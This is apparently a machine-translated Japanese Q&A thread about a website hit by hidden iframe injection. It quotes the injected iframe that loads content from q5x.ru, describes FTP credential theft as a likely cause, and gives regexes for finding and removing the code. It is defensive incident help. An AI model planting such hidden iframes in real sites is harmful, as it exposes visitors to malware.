私のウェブサイトは最近、隠されたiframeの挿入を伴うある種の攻撃に感染しており、そのソースはサイトq5x.ru(リンクしない)からのものでした。
A Google検索 この攻撃がどのように行われたかを理解するのに役立たなかったので、誰かがこれと同じ問題に遭遇したのではないかと思いました。
Iframeコードはある種のものでした:
<iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe>
リクエストに応じて、データベースを使用してASP.Net Webサイトを実行しています。フォームに関しては、ポストバックに使用されるのは明らかにASP.Netフォームです。
最近、クライアントのWebサイトの1つで同じ問題が発生しました。
この問題は、主にFTPクライアントを対象とし、ホスト名/ユーザー名/パスワードの組み合わせを検索するウイルス感染が原因である可能性があります。見つかると、FTPサーバーへの接続が開かれ、index。*ファイルが検索され、iFrameが追加されます。
私たちの特定のケースでは、私たちのクライアントはFTPサーバーに直接アクセスできる数少ないクライアントの1つでした。すぐにパスワードを変更し、ファイルのバックアップを復元し、クライアントのFTPアクセスを削除しました。
実行する必要のある手順:
また、Googleクローラーが感染中にサイトにアクセスすると、マルウェアリストに追加されることに注意してください。 これはあなたのサイトの評判に深刻な影響を及ぼします。これが発生した場合、次の手順を実行します:
ここにあなたを助けるかもしれないいくつかの秘訣があります:
感染したファイルをクリーンアップするにはどうすればよいですか?
これらの正規表現を使用して、悪意のあるコードを含むすべてのページを検索し、スペースに置き換えます。
<iframe src=\”http://[^"]*” width=105 height=175 style=\”visibility:hidden;
position:absolute\”></iframe>
echo \”<iframe src=\\\”http://[^"]*\” width=105 height=175 style=\\\”
visibility:hidden; position:absolute\\\”></iframe>\”;
サーバー内のすべてのファイルに対してこれを自動化するスクリプトを作成する必要がある場合があります。
出典:http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/
https://stackoverflow.com/questions/990437/iframe-script-attack-to-website
これは以前私に起こりました。問題のあるインジェクションスクリプトを手動で検索して削除する必要があります。念のため、パスワードを変更し、データベースとデータベーステーブルの名前も変更することをお勧めします。
@Aron writes おそらく、クライアント側のウイルスがパスワードをキャプチャした可能性がありますが(これは、この特定の攻撃に当てはまる可能性があります)、この種の攻撃は、サーバーソフトウェアのパッチが適用されていない脆弱性を悪用することがよくあります。 Webサーバー自体、CMS、または phpMyAdmin などのツールと同様です。
つまり、サーバー上ですべてのソフトウェアの最新バージョンを実行していることを確認しますか?
(または、FTPログは実際に何らかのアクティビティを示していますか?)